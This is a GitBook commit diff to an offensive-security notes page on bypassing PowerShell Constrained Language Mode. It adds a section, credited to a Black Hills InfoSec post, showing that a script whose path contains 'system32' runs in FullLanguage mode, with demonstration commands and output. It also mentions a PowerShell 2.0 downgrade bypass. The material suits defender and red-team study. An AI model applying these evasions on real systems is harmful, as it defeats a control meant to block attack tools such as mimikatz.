GitBook: [#1860] No subject

Author: mantvydasb

offensive-security/code-execution/powershell-constrained-language-mode-bypass.md

@@ -14,7 +14,7 @@ For fun - creating another powershell instance inside powershell without actuall
 
 ## Constrained Language Mode
 
-Enabling constrained language mode, that does not allow powershell execute complex attacks \(i.e. mimikatz\):
+Enabling constrained language mode, that does not allow powershell execute complex attacks (i.e. mimikatz):
 
 ```csharp
 [Environment]::SetEnvironmentVariable(‘__PSLockdownPolicy‘, ‘4’, ‘Machine‘)
@@ -41,6 +41,19 @@ If you have the ability to downgrade to Powershell 2.0, this can allow you to by
 
 ![](../../.gitbook/assets/ps-downgrade.png)
 
+## System32 Bypass
+
+[Carrie Roberts](https://twitter.com/OrOneEqualsOne) discovered and wrote in her post [https://www.blackhillsinfosec.com/constrained-language-mode-bypass-when-pslockdownpolicy-is-used/](https://www.blackhillsinfosec.com/constrained-language-mode-bypass-when-pslockdownpolicy-is-used/) that there's another way to bypass the contrained language mode and it's super easy - the path from where your script is being executed, needs to contain the string `system32`, meaning even if you rename the script to `system32.ps1`, it should work, so let's try it and confirm it works:
+
+```
+PS>.\test.ps1; mv .\test.ps1 system32.ps1; .\system32.ps1
+ConstrainedLanguage
+FullLanguage
+
+PS>cat .\system32.ps1
+$ExecutionContext.SessionState.LanguageMode
+```
+
 ## References
 
 {% embed url="https://blogs.msdn.microsoft.com/powershell/2017/11/02/powershell-constrained-language-mode/" %}
@@ -50,4 +63,3 @@ If you have the ability to downgrade to Powershell 2.0, this can allow you to by
 {% embed url="https://adsecurity.org/?p=2604" %}
 
 {% embed url="https://pentestn00b.wordpress.com/2017/03/20/simple-bypass-for-powershell-constrained-language-mode/" %}
-